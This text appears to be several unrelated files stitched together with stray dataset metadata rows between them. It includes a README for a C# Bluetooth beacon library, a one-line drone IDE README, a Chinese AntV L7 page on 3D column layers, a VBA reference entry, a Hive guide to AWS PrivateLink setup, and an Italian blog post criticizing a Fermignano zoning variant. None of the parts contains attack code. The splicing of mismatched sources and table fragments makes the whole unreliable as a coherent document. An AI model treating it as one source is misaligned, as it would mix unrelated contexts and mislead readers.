Directly use the received Bluetooth Low Energy Advertisement notifications from the base operating system and let the library take care of the rest for you. It extracts, combines and updates unique beacons, associated individual frames to the beacons and parses their contents - e.g., the beacon IDs, URLs or telemetry information like temperature or battery voltage.
[NuGet Library Download](https://www.nuget.org/packages/UniversalBeaconLibrary) | [Windows 10 Example App Download](https://www.microsoft.com/store/apps/9NBLGGH1Z24K)
## Background - Bluetooth Beacons
Bluetooth Low Energy / LE (BLE) allows objects to be discovered - for example, it enables your phone to connect to a heart rate belt or a headset. A Bluetooth Beacon does not connect to your phone; instead, it continuously transmits small amounts of data - no matter if someone is listening or not. The efficient nature of Bluetooth ensures that the battery of a beacon nevertheless lasts several months.
Phones and apps can react to Bluetooth Beacons - e.g., to trigger specific actions when the user is close to a physical location. In contrast to GPS, this works even indoors and has a much better accuracy.
To differentiate between different beacons and to give each one a unique meaning in your virtual world, beacons send out information packages. These are formatted according to a certain specification. While the general way of broadcasting these information packages is standardized by the Bluetooth Core specification, the beacon package contents are not. Platforms like Windows 10 come with APIs to receive Bluetooth LE advertisements, but does not contain an SDK to work with common beacon protocols.
## The Universal Beacon Library
Provides an easy way for C#/.NET apps to manage beacons and to parse their information packages.
As a developer, you only have to feed the received Bluetooth advertisements into the library - it will analyze, cluster and parse the contents, so that you can easily access the latest data from each individual beacon.
Clustering is achieved through the Bluetooth address (MAC): the constant and regular advertisements of multiple beacons are matched to unique beacons.
The next step is analyzing the conents of the advertisement payloads. The library can work with data comparable to Apple iBeacon (Proximity Beacon) frames, as well as the open [Eddystone specification](https://github.com/google/eddystone), including three frame types that have been defined:
* UID frames
* URL frames
* TLM (Telemetry) frames
* EID frames
Instead of having to implement the specifications yourself and worry about encodings and byte orderings, you can directly access the latest available information through convenient classes and properties. For unknown frames of other beacon types, it's easy to extend the library to parse the payload in a derived beacon frame class and make use of the beacon management and information update features of the library.
Note: for using Apple iBeacon technology in your services (in order to make your services compatible to iOS devices), you need to agree to and comply with the [Apple iBeacon license agreement](https://developer.apple.com/ibeacon/).
## Feature Overview
- Directly analyzes received Bluetooth LE advertisements (e.g., `BluetoothLEAdvertisementReceivedEventArgs` for UWP apps)
- Clusters based on Bluetooth MAC address and keeps frame types up to date with the latest information
- Retrieve Bluetooth address (MAC), signal strength (RSSI) and latest update timestamp for each beacon
- Parses individual advertisement frame contents
- Eddystone UID frame:
- Ranging data
- Namespace ID
- Instance ID
- Eddystone Telemetry (TLM) frame:
- Version
- Battery [V]
- Beacon temperature [°C]
- Count of advertisement frames sent since power up
- Time since power up
- Eddystone URL frame:
- Ranging data
- Complete URL
- Eddystone EID frame:
- Ranging data
- Ephemeral Identifier
- Proximity Beacon Frames (comparable to the Apple iBeacon format)
- Uuid
- Major ID
- Minor ID
- Raw payload for all other beacons
## Example Apps
The included example apps continuously scan for Bluetooth LE advertisements. They associate these with known or new Bluetooth MAC addresses to identify beacons. The individual advertisement frames are then parsed for known frame types - which are currently the three frame types defined by the Eddystone beacon format by Google, as well as Proximity Beacon frames (compatible to iBeacons).
The example app comes in two versions:
1. WindowsBeacons: Universal Windows app (UWP) called Bluetooth Beacon Interactor. The app has been tested on Windows 10 tablets and phones and requires Bluetooth LE (BLE) capable hardware. Make sure your device has Bluetooth activated (in Windows settings and also in hardware in case your device allows turning off bluetooth using a key combination) and is not in airplane mode. Download and test the example app from the Windows 10 store: https://www.microsoft.com/store/apps/9NBLGGH1Z24K
2. UniversalBeacon: Cross-Platform implementation with Xamarin. Core part in UniversalBeacon.Sample project. Platform-specific implementations in UniversalBeacon.Sample.Android and UniversalBeacon.Sample.UWP. iOS version is coming later. The Xamarin sample apps currently have a simpler UI than the UWP sample app.
### Permissions and Privacy Settings in Windows 10
To allow apps to receive data from Bluetooth Beacons, you have to ensure Windows 10 is configured correctly.
1. Turn off flight mode: Settings -> Network & Internet -> Flight mode
2. Turn on Bluetooth: Settings -> Devices -> Bluetooth
3. Turn on Device Sync: Settings -> Privacy -> Other devices -> Sync with devices (Example: beacons).
### Bluetooth on Android
Make sure that you activate Bluetooth on your Android device prior to running the example app. The app doesn't currently check if Bluetooth is active on your phone and you would otherwise get an exception about a missing "BLUETOOTH_PRIVILEGED" permission. This is unrelated to the actual Bluetooth Beacon library and just a small current limitation of the example.
## Usage example (C#)
### Registering for beacons and handling the data (C#, UWP)
```csharp
public sealed partial class MainPage : Page
{
// Bluetooth Beacons
private readonly BluetoothLEAdvertisementWatcher _watcher;
private readonly BeaconManager _beaconManager;
public MainPage()
{
// [...]
// Construct the Universal Bluetooth Beacon manager
var provider = new WindowsBluetoothPacketProvider();
_beaconManager = new BeaconManager(provider);
_beaconManager.BeaconAdded += BeaconManagerOnBeaconAdded;
_beaconManager.Start();
}
// Call this method e.g., when tapping a button
private void BeaconManagerOnBeaconAdded(object sender, Beacon beacon)
{
Debug.WriteLine("\nBeacon: " + beacon.BluetoothAddressAsString);
Debug.WriteLine("Type: " + beacon.BeaconType);
Debug.WriteLine("Last Update: " + beacon.Timestamp);
Debug.WriteLine("RSSI: " + beacon.Rssi);
foreach (var beaconFrame in beacon.BeaconFrames.ToList())
{
// Print a small sample of the available data parsed by the library
if (beaconFrame is UidEddystoneFrame)
{
Debug.WriteLine("Eddystone UID Frame");
Debug.WriteLine("ID: " + ((UidEddystoneFrame)beaconFrame).NamespaceIdAsNumber.ToString("X") + " / " +
((UidEddystoneFrame)beaconFrame).InstanceIdAsNumber.ToString("X"));
}
else if (beaconFrame is UrlEddystoneFrame)
{
Debug.WriteLine("Eddystone URL Frame");
Debug.WriteLine("URL: " + ((UrlEddystoneFrame)beaconFrame).CompleteUrl);
}
else if (beaconFrame is TlmEddystoneFrame)
{
Debug.WriteLine("Eddystone Telemetry Frame");
Debug.WriteLine("Temperature [°C]: " + ((TlmEddystoneFrame)beaconFrame).TemperatureInC);
Debug.WriteLine("Battery [mV]: " + ((TlmEddystoneFrame)beaconFrame).BatteryInMilliV);
}
else if (beaconFrame is EidEddystoneFrame)
{
Debug.WriteLine("Eddystone EID Frame");
Debug.WriteLine("Ranging Data: " + ((EidEddystoneFrame)beaconFrame).RangingData);
Debug.WriteLine("Ephemeral Identifier: " + BitConverter.ToString(((EidEddystoneFrame)beaconFrame).EphemeralIdentifier));
}
else if (beaconFrame is ProximityBeaconFrame)
{
Debug.WriteLine("Proximity Beacon Frame (iBeacon compatible)");
Debug.WriteLine("Uuid: " + ((ProximityBeaconFrame)beaconFrame).UuidAsString);
Debug.WriteLine("Major: " + ((ProximityBeaconFrame)beaconFrame).MajorAsString);
Debug.WriteLine("Major: " + ((ProximityBeaconFrame)beaconFrame).MinorAsString);
}
else
{
Debug.WriteLine("Unknown frame - not parsed by the library, write your own derived beacon frame type!");
Debug.WriteLine("Payload: " + BitConverter.ToString(((UnknownBeaconFrame)beaconFrame).Payload));
}
}
}
}
```
## Availability
The Core Universal Beacon Library is available in C# for .NET Standard 2.0 - it is therefore compatible to Windows UWP, Xamarin (Android / iOS / UWP / Mac / Linux) and other platforms supported by .NET Standard. Extension libraries are currently included for UWP and Xamarin/Android to interface with the platform Bluetooth APIs.
To keep up to date, either watch this project or [follow me on Twitter](https://twitter.com/andijakl).
## Installation
If you want to use the Universal Beacon Library from your own app, the easiest option is to use the NuGet package manager in Visual Studio 2015 to automatically download & integrate the library:
1. Tools -> NuGet Package Manager -> Manage NuGet Packages for Solution...
2. Search "Online" for "Universal Bluetooth Beacon Library"
3. Install the library.
Alternatively, use the NuGet Package Manager console as described here: https://www.nuget.org/packages/UniversalBeaconLibrary
To try the Xamarin (Android / UWP) or Windows 10 (UWP) example apps, download the complete library package from this site.
## Version History
### 4.0.0 - March 2019
* New library structure, adds support for Xamarin
* Upgrade to .net Standard 2.0.
* License change to MIT for the complete library
### 3.2.0 - August 2017
* Add support for Eddystone EID frame type: https://github.com/google/eddystone/tree/master/eddystone-eid
* Additional check for type in IsValid implementation of Eddystone frame types
### 3.1.0 - August 2017
* Improve events provided by cross-platform interop code to surface more events to the custom app implementation. Based on these improvements, the UWP example app now again correctly displays status and error messages.
* Adds BeaconAdded event to the BeaconManager class
* Updated sample code to also include handling Proximity Beacon frames (iBeacon compatible)
* UWP Sample app handles additional Bluetooth error status codes
### 3.0.0 - August 2017
* Port from UWP to .NET Standard 1.3, for cross platform compatibility to Windows, Linux, Mac and Xamarin (iOS, Android)
* Library split into core .NET Standard library, plus platform extension libraries for Android and UWP
* New Xamarin example app for Android and UWP
* Some code changes needed to update from the previous to this version!
* New collaborator: Chris Tacke, https://github.com/ctacke
### 2.0.0 - April 2017
* Add support for beacons comparable to iBeacons (contribution from kobush, https://github.com/andijakl/universal-beacon/pull/4)
* Make Eddystone URLs clickable
* Updated dependencies
* Fix status bar color on Windows 10 Mobile (thanks to Jesse Leskinen for the hint https://twitter.com/jessenic/status/806869124056043521)
### 1.8.1 - February 2016
* Use sbyte instead of byte for accessing ranging data in Eddystone UID and URL frames to ease development and remove the need for manual casting.
### 1.7.0 - January 2016
* Added translations to Chinese, French, Russian and Portuguese
### 1.6.0 - January 2016
* Added translation to German
* Fix crash when a Bluetooth Beacon with no further data is found.
### 1.5.0 - December 2015
* Allow last two bytes of the Eddystone UID frame to be 0x00 0x00 for RFU, according to the specification.
Some beacons do not send these bytes; the library now allows both variants. When creating a UID record,
the library will now add the two additional bytes to conform to the spec.
### 1.4.0 - December 2015
* Fix black window background color in example app on latest Windows 10 Mobile version
### 1.3.0 - September 2015
* Example app allows clearing visible information
### 1.2.0 - August 2015
* Improvements in naming and Eddystone references
### 1.1.0 - August 2015
* Manually construct Eddystone TLM & UID frames
### 1.0.0 - August 2015
* Initial release
* Works with received Bluetooth advertisements from the Windows 10 Bluetooth LE API
* Combines individual received frames based on the Bluetooth MAC address to associate them with unique beacons
* Support for parsing Google Eddystone URL, UID and TLM frames
## Status & Roadmap
The Universal Bluetooth Beacon library is classified as stable release and is in use in several projects, most importantly [Bluetooth Beacon Interactor](https://www.microsoft.com/store/apps/9NBLGGH1Z24K) for Windows 10.
Any open issues as well as planned features are tracked online:
https://github.com/andijakl/universal-beacon/issues
## License & Related Information
The library is released under the Apache license and is partly based on the [Eddystone™](https://github.com/google/eddystone) specification, which is also released under Apache license - see the LICENSE file for details.
iBeacon™ is a Trademark by Apple Inc. Bluetooth® is a registered trademarks of Bluetooth SIG, Inc.
The example application is licensed under the GPL v3 license - see LICENSE.GPL for details.
Developed by Andreas Jakl and Chris Tacke
https://twitter.com/andijakl
https://www.andreasjakl.com/
Library homepage on GitHub:
https://github.com/andijakl/universal-beacon
Library package on NuGet:
https://www.nuget.org/packages/UniversalBeaconLibrary
You might also be interested in the NFC / NDEF library:
https://github.com/andijakl/ndef-nfc
| 50.416084 | 502 | 0.776822 | eng_Latn | 0.975451 |
61dcb477c204735e003fcf3f120696200381f5e5 | 40 | md | Markdown | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | README.md | keinzweifall/race-drone-ide | ed34cb199370bbacf41e1aea324cf765eb4dcaa2 | [
"Apache-2.0"
] | null | null | null | # race-drone-ide
use at your own risk!
| 10 | 21 | 0.7 | eng_Latn | 0.999542 |
61dcbc8fc5cbe7ffa7a31d72685b030d4e781bc7 | 2,374 | md | Markdown | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | 1 | 2022-03-11T12:18:19.000Z | 2022-03-11T12:18:19.000Z | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | 1 | 2020-12-05T10:25:02.000Z | 2020-12-05T10:25:02.000Z | docs/api/point_layer/column.zh.md | cooper1x/L7 | 44bfbfe803ec54e293ec1155c8910820e8cfc818 | [
"MIT"
] | null | null | null | ---
title: 3D 柱图
order: 5
---
`markdown:docs/common/style.md`
3D 柱图地理区域上方会显示不同高度的柱体,主题的高度与其在数据集中的数值会成正比。
## 使用
3D 柱图通过 PointLayer 对象实例化,将 shape 设置成不同的 3Dshape
```javascript
import { PointLayer } from '@antv/l7';
```
<img width="60%" style="display: block;margin: 0 auto;" alt="案例" src='https://gw.alipayobjects.com/mdn/antv_site/afts/img/A*RVw4QKTJe7kAAAAAAAAAAABkARQnAQ'>
### shape
3D Shape 支持
- cylinder
- triangleColumn
- hexagonColumn
- squareColumn
### size
3D 柱图 size 需要设置三个维度 [w, l, z]
- w 宽
- l 长
- z 高度
size 设置成常量
```
layer.size([2,2,3])
```
size 回调函数设置
```
layer.size('unit_price', h => {
return [ 6, 6, h / 500 ];
})
```
```javascript
const column = new PointLayer({})
.source(data)
.shape('name', [
'cylinder',
'triangleColumn',
'hexagonColumn',
'squareColumn',
])
.size('unit_price', (h) => {
return [6, 6, h / 500];
})
.color('name', ['#5B8FF9', '#70E3B5', '#FFD458', '#FF7C6A'])
.style({
opacity: 1.0,
});
```
### animate
3D 柱图支持生长动画
animate 方法支持的布尔值和对象参数
<img width="60%" style="display: block;margin: 0 auto;" alt="案例" src='https://gw.alipayobjects.com/mdn/rms_816329/afts/img/A*l-SUQ5nU6n8AAAAAAAAAAAAAARQnAQ'>
```javascript
animate(true)
animate(false)
animate(animateOptions)
animateOptions: {
enable: boolean;
speed?: number = 0.01;
repeat?: number = 1;
}
```
## 额外的 style 配置
- sourceColor 设置 3D 柱图起始颜色(3D 柱图设置颜色渐变时会覆盖 color 设置的颜色)
- targetColor 设置 3D 柱图终止颜色
- opacityLinear 设置 3D 柱图透明度渐变
<img width="60%" style="display: block;margin: 0 auto;" alt="案例" src='https://gw.alipayobjects.com/mdn/rms_816329/afts/img/A*oZWGSIceykwAAAAAAAAAAAAAARQnAQ'>
```javascript
style({
opacityLinear: {
enable: true, // true - false
dir: 'up', // up - down
},
});
```
- lightEnable 是否开启光照
```javascript
layer.style({
opacity: 0.8,
sourceColor: 'red',
targetColor: 'yellow',
});
```
[光标柱图](../../../examples/point/column#column_light)
[渐变柱图](../../../examples/point/column#column_linear)
- heightFixed 设置 3D 柱体的高度固定(保持固定的笛卡尔高度而不是等像素高度)
🌟 3D 柱图在设置 heightFixed 为 true 后柱子的半径也会固定,从 v2.7.12 版本开始支持
```javascript
style({
heightfixed: true, // 默认为 false
});
```
- pickLight 设置 3D 柱体拾取高亮颜色是否支持光照计算
🌟 3D 柱图支持通过设置 pickLight 来控制拾取高亮颜色的光照计算,从 v2.7.12 版本开始支持
```javascript
style({
pickLight: true, // 默认为 false
});
```
`markdown:docs/common/layer/base.md`
| 16.71831 | 157 | 0.655434 | yue_Hant | 0.452193 |
61dd03e6b47100521f40e531da3b9e60a4c81864 | 541 | md | Markdown | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | 1 | 2018-10-15T16:15:38.000Z | 2018-10-15T16:15:38.000Z | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | api/Publisher.TextRange.WordsCount.md | qiezhenxi/VBA-Docs | c49aebcccbd73eadf5d1bddc0a4dfb622e66db5d | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: TextRange.WordsCount Property (Publisher)
keywords: vbapb10.chm5308499
f1_keywords:
- vbapb10.chm5308499
ms.prod: publisher
api_name:
- Publisher.TextRange.WordsCount
ms.assetid: 93d13801-b126-7ec9-8f79-89260f8f0140
ms.date: 06/08/2017
---
# TextRange.WordsCount Property (Publisher)
Returns the number of words in the text range represented by the parent **TextRange** object. Read-only.
## Syntax
_expression_. **WordsCount**
_expression_ A variable that represents a **TextRange** object.
### Return value
Long
| 17.451613 | 105 | 0.761553 | eng_Latn | 0.394719 |
61dd3a609a222c05d2065a52ee2e7551a637521f | 2,000 | markdown | Markdown | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | _posts/2021-03-10-post2.markdown | luigipacheco/Neosite | ccfa38c7848248d8dadaf3831c279278f1fd557c | [
"MIT"
] | null | null | null | ---
layout: post
title: "Neobrutal Chessmen"
date: 2021-03-09 18:54:32 -0500
image: assets/images/fulls/1.jpg
thumbnail: /assets/img/thumbnails/chessthumb.png
caption: Chessmen
project: true
comments: false
tags: [digital fabrication, design]
---
Chess set inspired by Brutalist Architecture

Brutalism is an modernist architectural style, featuring minimalistic but memorable design that promotes the use of raw materials, mainly concrete. This project aims to bring back the same aesthetic on a chess set that would be appealing to architects, designers and other creative minds that like to play chess.

Neobrutal chess is a simple design that will look great on a studio, living room, office etc.
<div class="sketchfab-embed-wrapper">
<iframe title="NEOBRUTAL chess set" frameborder="0" allowfullscreen mozallowfullscreen="true" webkitallowfullscreen="true" allow="fullscreen; autoplay; vr" xr-spatial-tracking execution-while-out-of-viewport execution-while-not-rendered web-share width="640" height="480" src="https://sketchfab.com/models/133e3c749063499ba171826be308ab1f/embed">
</iframe>
<p style="font-size: 13px; font-weight: normal; margin: 5px; color: #4A4A4A;">
<a href="https://sketchfab.com/3d-models/neobrutal-chess-set-133e3c749063499ba171826be308ab1f?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">NEOBRUTAL chess set</a>
by <a href="https://sketchfab.com/luigipacheco?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">luigipacheco</a>
on <a href="https://sketchfab.com?utm_medium=embed&utm_campaign=share-popup&utm_content=133e3c749063499ba171826be308ab1f" target="_blank" style="font-weight: bold; color: #1CAAD9;">Sketchfab</a>
</p>
</div>
| 64.516129 | 350 | 0.7745 | eng_Latn | 0.682487 |
61ddd1c5e0763e8337f4052a09fe12b0f41cea85 | 8,666 | md | Markdown | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | null | null | null | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | 5 | 2021-09-05T00:50:13.000Z | 2022-03-04T01:38:11.000Z | docs/awsprivatelink.md | arilivigni/hive | 616301492b6f2ff2e9eeadc156d4b780ce0f04de | [
"Apache-2.0"
] | null | null | null | # AWS Private Link
## Overview
Customers often want the core services of their OpenShift cluster to be
available only on the internal network and not on the Internet. The API server
is one such service that customers do not want to be accessible over the
Internet. The OpenShift Installer allows creating clusters that have their
services published only on the internal network by setting `publish: Internal`
in the install-config.yaml.
Since Hive is usually running outside the network where the clusters exists, it
requires access to the cluster's API server which mostly translates to having
the API reachable over the Internet. There can be some restrictions setup to
allow only Hive to access the API but these are usually not acceptable by
security focused customers.
AWS provides a feature called AWS Private Link ([see doc][aws-private-link-overview]) that allows
accessing private services in customer VPCs from another account using AWS's internal
networking and not the Internet. AWS Private Link involves creating a VPC
Endpoint Service in customer's account that is backed by one or more internal
NLBS and a VPC Endpoint in service provider's account. This allows clients in
service provider's VPC to access the NLB backed service in customer's account
using the endpoint-endpoint service Private Link. So the internal service is
now accessible to the service provider without exposing the service to the
Internet.
Using this same architecture, we create a VPC Endpoint Service, VPC Endpoint
pair to create an Private Link to cluster's internal NLB for k8s API server,
allowing Hive to access the API without forcing the cluster to publish it on
the Internet.
## Configuring Hive to enable AWS Private Link
To configure Hive to support Private Link in a specific region,
1. Create VPCs in that region that can be used to create VPC Endpoints.
NOTE: There is a hard limit of 255 VPC Endpoints in a region, therefore you
will need multiple VPCs to support more cluster in that region.
2. For each VPC, create subnets in all the supported availability zones of the
region.
NOTE: each subnet must have at least 255 usuable IPs because the controller.
For example let's create VPCs in us-east-1 region, that has 6 AZs.
```txt
vpc-1 (us-east-1) : 10.0.0.0/20
subnet-11 (us-east-1a): 10.0.0.0/23
subnet-12 (us-east-1b): 10.0.2.0/23
subnet-13 (us-east-1c): 10.0.4.0/23
subnet-12 (us-east-1d): 10.0.8.0/23
subnet-12 (us-east-1e): 10.0.10.0/23
subnet-12 (us-east-1f): 10.0.12.0/23
```
```txt
vpc-2 (us-east-1) : 10.0.16.0/20
subnet-21 (us-east-1a): 10.0.16.0/23
subnet-22 (us-east-1b): 10.0.18.0/23
subnet-23 (us-east-1c): 10.0.20.0/23
subnet-24 (us-east-1d): 10.0.22.0/23
subnet-25 (us-east-1e): 10.0.24.0/23
subnet-26 (us-east-1f): 10.0.28.0/23
```
3. Make sure all the Hive environments (Hive VPCs) have network reachability to
these VPCs created above for VPC Endpoints using peering, transit gateways, etc.
4. Gather a list of VPCs that will need to resolve the DNS setup for Private
Link. This should at least include the VPC of the Hive being configured, and
can include list of all VPCs where various Hive controllers exists.
5. Update the HiveConfig to enable Private Link for clusters in that region.
```yaml
## hiveconfig
spec:
awsPrivateLink:
## this this is list if inventory of VPCs that can be used to create VPC
## endpoints by the controller
endpointVPCInventory:
- region: us-east-1
vpcID: vpc-1
subnets:
- availabilityZone: us-east-1a
subnetID: subnet-11
- availabilityZone: us-east-1b
subnetID: subnet-12
- availabilityZone: us-east-1c
subnetID: subnet-13
- availabilityZone: us-east-1d
subnetID: subnet-14
- availabilityZone: us-east-1e
subnetID: subnet-15
- availabilityZone: us-east-1f
subnetID: subnet-16
- region: us-east-1
vpcID: vpc-2
subnets:
- availabilityZone: us-east-1a
subnetID: subnet-21
- availabilityZone: us-east-1b
subnetID: subnet-22
- availabilityZone: us-east-1c
subnetID: subnet-23
- availabilityZone: us-east-1d
subnetID: subnet-24
- availabilityZone: us-east-1e
subnetID: subnet-25
- availabilityZone: us-east-1f
subnetID: subnet-26
## credentialsSecretRef points to a secret with permissions to create
## resources in account where the inventory of VPCs exist.
credentialsSecretRef:
name: < hub-account-credentials-secret-name >
## this is a list of VPC where various Hive clusters exists.
associatedVPCs:
- region: region-hive1
vpcID: vpc-hive1
credentialsSecretRef:
name: < credentials that have access to account where Hive1 VPC exists >
- region: region-hive2
vpcID: vpc-hive2
credentialsSecretRef:
name: < credentials that have access to account where Hive2 VPC exists>
```
You can include VPC from all the regions where private link is supported in the
endpointVPCInventory list. The controller will pick a VPC appropriate for the
ClusterDeployment.
### Security Groups for VPC Endpoints
Each VPC Endpoint in AWS has a Security Group attached to control access to the endpoint.
See the [docs][control-access-vpc-endpoint] for details.
When Hive creates VPC Endpoint, it does not specify any Security Group and therefore the
default Security Group of the VPC is attached to the VPC Endpoint. Therefore, the default
security group of the VPC where VPC Endpoints are created must have rules to allow traffic
from the Hive installer pods.
For example, if Hive is running in hive-vpc(10.1.0.0/16), there must be a rule in default
Security Group of VPC where VPC Endpoint is created that allows ingess from 10.1.0.0/16.
## Using AWS Private Link
Once Hive is configured to support Private Link for AWS clusters, customers can
create ClusterDeployment objects with Private Link by setting the
`privateLink.enabled` to `true` in `aws` platform. This is only supported in
regions where Hive is configured to support Private Link, the validating
webhooks will reject ClusterDeployments that request private link in
unsupported regions.
```yaml
spec:
platform:
aws:
privateLink:
enabled: true
```
The controller provides progress and failure updates using `AWSPrivateLinkReady` and
`AWSPrivateLinkFailed` conditions on the ClusterDeployment.
## Permissions required for AWS Private Link
There multiple credentials involved in the configuring AWS Private Link and there are different
expectations of required permissions for these credentials.
1. The credentials on ClusterDeployment
The following permissions are required:
```txt
ec2:CreateVpcEndpointServiceConfiguration
ec2:DescribeVpcEndpointServiceConfigurations
ec2:ModifyVpcEndpointServiceConfiguration
ec2:DescribeVpcEndpointServicePermissions
ec2:ModifyVpcEndpointServicePermissions
ec2:DeleteVpcEndpointServiceConfigurations
```
2. The credentials specified in HiveConfig for endpoint VPCs account `.spec.awsPrivateLink.credentialsSecretRef`
The following permissions are required:
```txt
ec2:DescribeVpcEndpointServices
ec2:DescribeVpcEndpoints
ec2:CreateVpcEndpoint
ec2:CreateTags
ec2:DescribeVPCs
ec2:DeleteVpcEndpoints
route53:CreateHostedZone
route53:GetHostedZone
route53:ListHostedZonesByVPC
route53:AssociateVPCWithHostedZone
route53:DisassociateVPCFromHostedZone
route53:CreateVPCAssociationAuthorization
route53:DeleteVPCAssociationAuthorization
route53:ListResourceRecordSets
route53:ChangeResourceRecordSets
route53:DeleteHostedZone
```
3. The credentials specified in HiveConfig for associating VPCs to the Private Hosted Zone.
`.spec.awsPrivateLink.associatedVPCs[$idx].credentialsSecretRef`
The following permissions are required in the account where the VPC exists:
```txt
route53:AssociateVPCWithHostedZone
route53:DisassociateVPCFromHostedZone
ec2:DescribeVPCs
```
[aws-private-link-overview]: https://docs.aws.amazon.com/vpc/latest/privatelink/endpoint-services-overview.html
[control-access-vpc-endpoint]: https://docs.aws.amazon.com/vpc/latest/privatelink/vpc-endpoints-access.html#vpc-endpoints-security-groups
| 38.008772 | 137 | 0.728018 | eng_Latn | 0.9738 |
61de51046ae1545a18c7d6484e8d6cc9855828f6 | 7,507 | markdown | Markdown | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | _posts/2015-05-25-la-nuova-variante-al-prg.markdown | Kjir/f5s | 381422655a45385da7c3031a1a5b7e792176ef58 | [
"MIT"
] | null | null | null | ---
author: parides17
comments: true
date: 2015-05-25 07:11:14+00:00
layout: post
slug: la-nuova-variante-al-prg
title: La vera faccia della nuova Variante al PRG
wordpress_id: 1737
categories:
- Ambiente
---
_**[
](/images/2015/06/studio-piano-regolatore-2015.jpg)La millantata “svolta ambientalista” è in realtà una monetizzazione indiscriminata del suolo.**_
Il 26 febbraio 2015 il Consiglio Comunale presentava la Variante 2014 al Piano Regolatore Generale (PRG) e già il giorno dopo, strilloni e menestrelli parlavano di “svolta ambientalista” dell’amministrazione Cancellieri.
Veniva proclamata una “rivoluzione verde” con la quale l’amministrazione prevedeva più retrocessioni che nuove edificabilità e soprattutto, stralciava un’ampia area dalla zona artigianale di San Silvestro.
Tuttavia, visto che le opinioni fondate non si costruiscono sulle voci di paese ma sui documenti, siamo andati a leggere le oltre 150 pagine di Variante per vederci chiaro e **quello che emerge è tutt'altro che una rivoluzione ecologica**.
Preso atto della gravità dell'intervento, abbiamo ritenuto indispensabile presentare le nostre Osservazioni alla Variante al PRG (depositate il 15/05/2015), per tentare di impedire all'amministrazione di fare errori irreparabili.
Come riportato anche nella Relazione Urbanistica, la superficie territoriale complessiva dei terreni ai quali questa Variante toglie l'etichetta “edificabile” e rimette quella “agricola/verde” è più vasta di quella che, invece, da “agricola/verde” diventa “edificabile”.
Questo dato, però, è frutto di uno sterile calcolo matematico che **non tiene conto delle caratteristiche dei terreni interessati dalla Variante**: della loro dimensione, posizione e della loro reale utilizzabilità in termini di agricoltura.
[](/images/2015/05/SanSilvestro.jpg)Questo “giochetto” è evidente nella retrocessione attuata nell'area artigianale di San Silvestro e la nuova edificabilità inserita nella zona industriale di Fermignano. In sede di presentazione della Variante, l'amministrazione ha giustificato questa nuova ampia cementificazione nella zona industriale spiegando che non stavano facendo altro che spostare un'area edificabile dalla zona artigianale di San Silvestro a quella di Fermignano, nell'ottica di bloccare l'espansione a San Silvestro e sfruttare invece il polo industriale cittadino già esistente. Peccato però che, nella realtà dei fatti, quella di San Silvestro sia una “finta retrocessione”. Sulla carta quel terreno è sì tornato “agricolo”, ma per la **quasi totalità è già coperto di pannelli fotovoltaici!
**
E' noto che l'installazione di **impianti fotovoltaici sul suolo modificano le caratteristiche organiche e biologiche del terreno, compromettendo la sua fertilità**. Ciò che invece non si sa ancora con certezza è quanti anni e quanti soldi serviranno per far tornare fertile un terreno oggi coperto di pannelli fotovoltaici. E' evidente come non c'è alcuna svolta ambientalista, non c'è alcun risparmio di suolo, ma solo una nuova area fabbricabile nella zona industriale di Fermignano e un **terreno a San Silvestro che di “agricolo” ha solo il nome**.
[](/images/2015/05/capaino.jpg)Ma l'intervento che spazza via ogni dubbio circa la sensibilità verso l'ambiente di questa Variante è certamente quello che interessa le zone di Ca' La Vittoria e Ca' Paino, che si sostanzia in una vera e propria **devastazione ambientale**.
Stiamo parlando delle **aree che costeggiano la lunga strada pedonale che conduce al cimitero**. Una strada utilizzata da tutta la popolazione perché è sicura, in quanto non trafficata dalle auto, e perché è bella, costeggiata da un paesaggio rurale che la rende l'unica all'interno del paese adatta a fare sport e lunghe passeggiate. Ed è per questo che tutta la popolazione la frequenta quotidianamente.
Non si capisce per quale motivo, quindi, **l'amministrazione abbia voluto infliggere un tale schiaffo ai propri cittadini**. Di quale schiaffo stiamo parlando? Nelle aree che costeggiano la strada che conduce al cimitero oggi ci sono dei bellissimi terreni agricoli: **la nuova Variante li spazza via per permettere la costruzione di due lunghe schiere di edifici residenziali**.
**Il risultato è un enorme danno alla popolazione che viene così privata di un importante e frequentatissimo luogo di svago e aggregazione**. Ma il danno è grave anche in termini urbanistici, perché questo intervento cementificherebbe uno dei più belli e importanti ingressi del paese.
